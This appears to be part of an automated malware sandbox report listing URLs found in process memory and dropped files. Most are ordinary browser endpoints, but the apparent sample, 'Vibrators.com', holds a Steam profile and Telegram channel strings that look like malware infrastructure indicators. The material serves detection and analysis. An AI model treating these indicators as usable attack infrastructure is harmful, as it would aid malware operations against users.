Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://m.vk.com/
Source: chrome.exe, 0000000F.00000003.1965601541.000016CC01354000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/?tab
Source: chrome.exe, 0000000F.00000003.1966072298.000016CC01640000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1966560548.000016CC01EBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1965885038.000016CC01EBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1966072298.000016CC01630000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1965652470.000016CC01EBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1966610265.000016CC01ED8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/?tab=rm&ogbl
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://mail.google.com/mail/mu/mp/266/#tl/Inbox
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://manifestdeliveryservice.edgebrowser.microsoft-staging-falcon.io/app/page-context-demo
Source: msedge.exe, 00000015.00000002.2060738440.00007B60003AC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000002.2210399664.00001040002D4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://msn.cn/
Source: msedge.exe, 00000015.00000002.2060738440.00007B60003AC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000002.2210399664.00001040002D4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://msn.com/
Source: Cookies.28.dr	String found in binary or memory: https://msn.comXID/
Source: Cookies.28.dr	String found in binary or memory: https://msn.comXIDv10t
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://music.amazon.com
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://music.apple.com
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://music.yandex.com
Source: chrome.exe, 0000000F.00000003.1951359134.000016CC01670000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/shielded-email2B
Source: QIo3SytSZA.exe	String found in binary or memory: https://notepad-plus-plus.org/0
Source: 000003.log9.27.dr	String found in binary or memory: https://ntp.msn.com
Source: 000003.log6.27.dr	String found in binary or memory: https://ntp.msn.com/
Source: QuotaManager.27.dr	String found in binary or memory: https://ntp.msn.com/_default
Source: 2cc80dabc69f58b6_1.27.dr	String found in binary or memory: https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=288
Source: QuotaManager.27.dr, QuotaManager-journal.27.dr	String found in binary or memory: https://ntp.msn.com/ntp.msn.com_default
Source: 2cc80dabc69f58b6_0.27.dr	String found in binary or memory: https://ntp.msn.comService-Worker-Allowed:
Source: msedge.exe, 00000015.00000002.2060738440.00007B60003AC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000002.2210399664.00001040002D4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://office.net/
Source: chrome.exe, 0000000F.00000003.1966375334.000016CC01F20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1965992834.000016CC01F64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogads-pa.googleapis.com
Source: chrome.exe, 0000000F.00000003.1966973623.000016CC002A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogs.google.com
Source: chrome.exe, 0000000F.00000003.1966375334.000016CC01F20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1965992834.000016CC01F64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogs.google.com/widget/app/so?eom=1
Source: chrome.exe, 0000000F.00000003.1966375334.000016CC01F20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1965992834.000016CC01F64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogs.google.com/widget/callout?eom=1
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://open.spotify.com
Source: chrome.exe, 0000000F.00000003.1917275385.000016CC00700000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
Source: chrome.exe, 0000000F.00000003.1917275385.000016CC00700000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1673999601&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 0000000F.00000003.1917275385.000016CC00700000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1679317318&target=OPTIMIZATION_TARGET_LAN
Source: chrome.exe, 0000000F.00000003.1917275385.000016CC00700000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049402&target=OPTIMIZATION_TARGET_GEO
Source: chrome.exe, 0000000F.00000003.1917275385.000016CC00700000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049414&target=OPTIMIZATION_TARGET_NOT
Source: chrome.exe, 0000000F.00000003.1917275385.000016CC00700000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695051229&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 0000000F.00000003.1917275385.000016CC00700000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=210230727&target=OPTIMIZATION_TARGET_CLIE
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://outlook.live.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://outlook.live.com/mail/0/
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://outlook.live.com/mail/compose?isExtension=true
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://outlook.live.com/mail/inbox?isExtension=true&sharedHeader=1&nlp=1&client_flight=outlookedge
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://outlook.office.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://outlook.office.com/mail/0/
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://outlook.office.com/mail/compose?isExtension=true
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://outlook.office.com/mail/inbox?isExtension=true&sharedHeader=1&client_flight=outlookedge
Source: msedge.exe, 00000015.00000003.2043254973.00007B6000270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2043093243.00007B6000268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153048096.000010400026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2152912348.0000104000264000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/AddSession
Source: msedge.exe, 00000015.00000003.2043254973.00007B6000270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2043093243.00007B6000268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153048096.000010400026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2152912348.0000104000264000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/Logout
Source: msedge.exe, 00000019.00000003.2153048096.000010400026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2152912348.0000104000264000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/LogoutYxAB
Source: msedge.exe, 00000015.00000003.2043254973.00007B6000270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2043093243.00007B6000268000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/LogoutYxABzen
Source: msedge.exe, 00000015.00000003.2043254973.00007B6000270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2043093243.00007B6000268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153048096.000010400026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2152912348.0000104000264000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/MergeSession
Source: msedge.exe, 00000015.00000003.2043254973.00007B6000270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2043093243.00007B6000268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153048096.000010400026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2152912348.0000104000264000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/OAuthLogin
Source: msedge.exe, 00000015.00000003.2043254973.00007B6000270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2043093243.00007B6000268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153048096.000010400026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2152912348.0000104000264000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/RotateBoundCookies
Source: msedge.exe, 00000015.00000003.2043254973.00007B6000270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2043093243.00007B6000268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153048096.000010400026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2152912348.0000104000264000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/chrome/blank.html
Source: msedge.exe, 00000015.00000003.2043254973.00007B6000270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2043093243.00007B6000268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153048096.000010400026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2152912348.0000104000264000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/o/oauth2/revoke
Source: msedge.exe, 00000015.00000003.2043254973.00007B6000270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2043093243.00007B6000268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153048096.000010400026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2152912348.0000104000264000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/oauth/multilogin
Source: msedge.exe, 00000015.00000003.2043254973.00007B6000270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2043093243.00007B6000268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153048096.000010400026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2152912348.0000104000264000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/oauth2/v1/userinfo
Source: msedge.exe, 00000015.00000003.2043254973.00007B6000270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2043093243.00007B6000268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153048096.000010400026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2152912348.0000104000264000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/oauth2/v2/tokeninfo
Source: msedge.exe, 00000015.00000003.2043254973.00007B6000270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2043093243.00007B6000268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153048096.000010400026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2152912348.0000104000264000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/oauth2/v4/token
Source: msedge.exe, 00000015.00000003.2043254973.00007B6000270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2043093243.00007B6000268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153048096.000010400026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2152912348.0000104000264000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/reauth/v1beta/users/
Source: msedge.exe, 00000015.00000003.2043254973.00007B6000270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2043093243.00007B6000268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153048096.000010400026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2152912348.0000104000264000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/v1/issuetoken
Source: msedge.exe, 00000015.00000003.2043254973.00007B6000270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2043093243.00007B6000268000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/v1/issuetokenhttps://permanently-removed.invalid/oauth2/v4/token
Source: chrome.exe, 0000000F.00000003.1931234222.000016CC00314000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1931501095.000016CC0120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1931406710.000016CC01134000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://photos.google.com?referrer=CHROME_NTP
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://powerpoint.new?from=EdgeM365Shoreline
Source: chrome.exe, 0000000F.00000003.1951359134.000016CC01670000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.gcp.privacysandboxservices.com
Source: chrome.exe, 0000000F.00000003.1951359134.000016CC01670000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com
Source: chrome.exe, 0000000F.00000003.1951359134.000016CC01670000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
Source: chrome.exe, 0000000F.00000003.1951359134.000016CC01670000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com
Source: chrome.exe, 0000000F.00000003.1951359134.000016CC01670000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
Source: chrome.exe, 0000000F.00000003.1951359134.000016CC01670000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://shieldedids-pa.googleapis.com2
Source: chrome.exe, 0000000F.00000003.1951359134.000016CC01670000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://shieldedids-pa.googleapis.comJv
Source: 2cc80dabc69f58b6_1.27.dr	String found in binary or memory: https://srtb.msn.cn/
Source: 2cc80dabc69f58b6_1.27.dr	String found in binary or memory: https://srtb.msn.com/
Source: chrome.exe, 0000000F.00000003.1938569998.000016CC002A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: chrome.exe, 0000000F.00000003.1966072298.000016CC01640000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1966560548.000016CC01EBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1965885038.000016CC01EBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1966072298.000016CC01630000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1965652470.000016CC01EBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1966610265.000016CC01ED8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com/gb/images/bar/al-icon.png
Source: Vibrators.com, 0000000B.00000003.1708990346.00000000039BA000.00000004.00000800.00020000.00000000.sdmp, Vibrators.com, 0000000B.00000003.1708846807.0000000000F23000.00000004.00000020.00020000.00000000.sdmp, Vibrators.com, 0000000B.00000002.2507233828.00000000039B1000.00000040.00001000.00020000.00000000.sdmp, Vibrators.com, 0000000B.00000003.1709382685.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp, Vibrators.com, 0000000B.00000002.2504350523.0000000000F03000.00000004.00000020.00020000.00000000.sdmp, Vibrators.com, 0000000B.00000002.2504454906.0000000000FB8000.00000004.00000020.00020000.00000000.sdmp, Vibrators.com, 0000000B.00000003.1708781553.00000000036A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199809363512
Source: Vibrators.com, 0000000B.00000003.1708781553.00000000036A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199809363512m0nk3Mozilla/5.0
Source: Vibrators.com, 0000000B.00000002.2510816768.000000000630A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: Vibrators.com, 0000000B.00000002.2510816768.000000000630A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: Vibrators.com, 0000000B.00000003.1708681108.0000000000F3A000.00000004.00000020.00020000.00000000.sdmp, Vibrators.com, 0000000B.00000003.1708655612.0000000000FD0000.00000004.00000020.00020000.00000000.sdmp, Vibrators.com, 0000000B.00000003.1708906121.0000000000FE7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.m
Source: Vibrators.com, 0000000B.00000002.2504312756.0000000000ECF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/
Source: Vibrators.com, 0000000B.00000002.2504312756.0000000000ECF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/O:lc
Source: Vibrators.com, 0000000B.00000003.1708681108.0000000000F3A000.00000004.00000020.00020000.00000000.sdmp, Vibrators.com, 0000000B.00000003.1708655612.0000000000FD0000.00000004.00000020.00020000.00000000.sdmp, Vibrators.com, 0000000B.00000003.1708906121.0000000000FE7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/k04
Source: Vibrators.com, 0000000B.00000003.1708990346.00000000039BA000.00000004.00000800.00020000.00000000.sdmp, Vibrators.com, 0000000B.00000003.1708846807.0000000000F23000.00000004.00000020.00020000.00000000.sdmp, Vibrators.com, 0000000B.00000002.2507233828.00000000039B1000.00000040.00001000.00020000.00000000.sdmp, Vibrators.com, 0000000B.00000002.2505005731.00000000036AC000.00000004.00000800.00020000.00000000.sdmp, Vibrators.com, 0000000B.00000003.1709382685.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp, Vibrators.com, 0000000B.00000002.2504350523.0000000000F03000.00000004.00000020.00020000.00000000.sdmp, Vibrators.com, 0000000B.00000002.2504454906.0000000000FB8000.00000004.00000020.00020000.00000000.sdmp, Vibrators.com, 0000000B.00000002.2507233828.00000000039FD000.00000040.00001000.00020000.00000000.sdmp, Vibrators.com, 0000000B.00000003.1708781553.00000000036A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://t.me/k04ael
Source: Vibrators.com, 0000000B.00000002.2505005731.00000000036A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://t.me/k04ael-
Source: Vibrators.com, 0000000B.00000002.2505005731.00000000036A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://t.me/k04ael1
Source: Vibrators.com, 0000000B.00000003.1708781553.00000000036A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://t.me/k04aelm0nk3Mozilla/5.0
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://tidal.com/
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://twitter.com/
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://vibe.naver.com/today
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://web.skype.com/?browsername=edge_canary_shoreline
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://web.skype.com/?browsername=edge_stable_shoreline
Source: Vibrators.com, 0000000B.00000002.2505005731.00000000036AC000.00000004.00000800.00020000.00000000.sdmp, Vibrators.com, 0000000B.00000002.2507233828.00000000039FD000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://web.telegram.org
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://web.telegram.org/
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://web.whatsapp.com
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://word.new?from=EdgeM365Shoreline
Source: Vibrators.com, 0000000B.00000002.2508933737.000000000615F000.00000004.00000800.00020000.00000000.sdmp, Vibrators.com, 0000000B.00000002.2505005731.000000000372E000.00000004.00000800.00020000.00000000.sdmp, P8QIEK.11.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_e149f5d53c9263616797a13067f7a114fa287709b159d0a5
Source: Cellular.0.dr, Vibrators.com.2.dr	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://www.deezer.com/
Source: Vibrators.com, 0000000B.00000002.2505874064.00000000038BF000.00000004.00000800.00020000.00000000.sdmp, CBASRI.11.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: Vibrators.com.2.dr	String found in binary or memory: https://www.globalsign.com/repository/0
Source: chrome.exe, 0000000F.00000003.1938569998.000016CC002A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com
Source: chrome.exe, 0000000F.00000003.1938569998.000016CC002A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: chrome.exe, 0000000F.00000003.1938569998.000016CC002A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: chrome.exe, 0000000F.00000003.1914593476.000016CC00CC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/
Source: content.js.27.dr, content_new.js.27.dr	String found in binary or memory: https://www.google.com/chrome
Source: chrome.exe, 0000000F.00000003.1951359134.000016CC01670000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/go-mobile/?ios-campaign=desktop-chr-ntp&android-campaign=desktop-chr-n
Source: chrome.exe, 0000000F.00000003.1951359134.000016CC01670000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/hats/index.htmlb
Source: Vibrators.com, 0000000B.00000002.2508933737.0000000005F0B000.00000004.00000800.00020000.00000000.sdmp, Vibrators.com, 0000000B.00000002.2505874064.00000000038BF000.00000004.00000800.00020000.00000000.sdmp, Web Data.27.dr, ZU3O8G.11.dr, CBASRI.11.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: chrome.exe, 0000000F.00000003.1965601541.000016CC01354000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/imghp?hl
Source: chrome.exe, 0000000F.00000003.1966072298.000016CC01640000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1966560548.000016CC01EBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1965885038.000016CC01EBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1966072298.000016CC01630000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1965652470.000016CC01EBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1966610265.000016CC01ED8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/imghp?hl=en&tab=ri&ogbl
Source: chrome.exe, 0000000F.00000003.1966375334.000016CC01F20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1965992834.000016CC01F64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/intl/en/about/products?tab=rh
Source: chrome.exe, 0000000F.00000003.1951359134.000016CC01670000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search
Source: chrome.exe, 0000000F.00000003.1931406710.000016CC01134000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search?q=$
Source: chrome.exe, 0000000F.00000003.1927203972.000016CC002A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/speech-api/v2/synthesize?
Source: chrome.exe, 0000000F.00000003.1938569998.000016CC002A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.comAccess-Control-Allow-Credentials:
Source: chrome.exe, 0000000F.00000003.1951359134.000016CC01670000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/aida2
Source: chrome.exe, 0000000F.00000003.1959112118.000016CC01908000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1959211329.000016CC01910000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1959157869.000016CC0190C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1959341788.000016CC01918000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1959286987.000016CC01914000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager
Source: chrome.exe, 0000000F.00000003.1951359134.000016CC01670000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager2
Source: chrome.exe, 0000000F.00000003.1951359134.000016CC01670000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager23
Source: chrome.exe, 0000000F.00000003.1938569998.000016CC002A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: chrome.exe, 0000000F.00000003.1938569998.000016CC002A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com
Source: chrome.exe, 0000000F.00000003.1966463684.000016CC01F00000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
Source: chrome.exe, 0000000F.00000003.1966135267.000016CC01F78000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1966072298.000016CC01640000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1966560548.000016CC01EBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1965885038.000016CC01EBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1965652470.000016CC01EBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1966610265.000016CC01ED8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1966463684.000016CC01F00000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
Source: chrome.exe, 0000000F.00000003.1966375334.000016CC01F20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1965992834.000016CC01F64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.otmEBJ358uU.2019.O/rt=j/m=q_dnp
Source: chrome.exe, 0000000F.00000003.1966375334.000016CC01F20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1965992834.000016CC01F64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://www.iheart.com/podcast/
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://www.instagram.com
